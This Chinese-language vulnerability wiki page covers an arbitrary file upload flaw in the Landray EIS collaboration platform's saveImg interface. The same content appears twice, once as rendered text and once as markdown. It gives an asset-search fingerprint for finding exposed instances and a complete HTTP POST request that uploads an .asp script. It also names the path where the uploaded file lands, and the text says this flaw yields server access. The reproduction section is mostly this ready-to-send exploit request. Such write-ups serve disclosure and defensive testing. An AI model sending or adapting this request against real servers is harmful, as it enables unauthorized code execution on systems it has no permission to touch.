fofamini-wiki

登录白背景

源码

蓝凌 EIS智慧协同平台saveImg接口任意文件上传

一、漏洞简介

蓝凌智慧协同平台EIS以“让工作更智慧”为核心设计理念，面向成长型企业管理需求特别开发设计，旨在全面解决成长型企业的各种难题，蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。

二、影响版本

蓝凌EIS智慧协同办公平台

三、资产测绘

hunterweb.icon=="585275a4cc54b8414554d03e1359a101"

特征

四、漏洞复现

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 198

------WebKitFormBoundary
Content-Disposition:form-data;name="file"filename="a.asp"
Content-Type: text/html

<% response.write("hello world")%>
------WebKitFormBoundary--

上传文件位置

/files/editor_img/20230927102035735197/20230927102035735197.asp

原文: https://www.yuque.com/xiaokp7/ocvun2/dz57w7o2ibitwp2k

# 蓝凌 EIS智慧协同平台saveImg接口任意文件上传

# 一、漏洞简介
蓝凌智慧协同平台EIS以“让工作更智慧”为核心设计理念，面向成长型企业管理需求特别开发设计，旨在全面解决成长型企业的各种难题，蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限。

# 二、影响版本

- 蓝凌EIS智慧协同办公平台

# 三、资产测绘

- hunter`web.icon=="585275a4cc54b8414554d03e1359a101"`

![image.png](./img/gElk7WnRZL5WJeBO/1695781361668-b6da51c8-4280-4dde-8fa3-62c69433e064-513124.png)

- 特征

![image.png](./img/gElk7WnRZL5WJeBO/1695781168608-7b142276-b588-4844-837a-4bcf995ad670-830431.png)

# 四、漏洞复现
```
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 198

------WebKitFormBoundary
Content-Disposition:form-data;name="file"filename="a.asp"
Content-Type: text/html

<% response.write("hello world")%>
------WebKitFormBoundary--
```
![image.png](./img/gElk7WnRZL5WJeBO/1695781327054-8865f720-9538-43c3-9aca-c0bb996e1a38-771301.png)
上传文件位置
```
/files/editor_img/20230927102035735197/20230927102035735197.asp
```
![image.png](./img/gElk7WnRZL5WJeBO/1695781288504-67fff7b8-77dd-4717-a9db-c84d415370ad-290669.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dz57w7o2ibitwp2k>